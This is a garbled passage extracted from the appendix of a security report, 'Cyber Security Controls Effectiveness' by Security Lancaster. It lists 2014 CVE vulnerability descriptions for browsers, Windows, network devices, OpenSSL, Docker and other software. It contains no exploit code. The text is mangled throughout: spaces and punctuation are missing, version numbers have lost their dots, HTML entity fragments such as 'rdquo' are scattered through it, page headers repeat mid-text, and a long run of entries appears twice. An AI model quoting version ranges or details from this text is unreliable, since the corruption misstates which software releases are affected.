CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
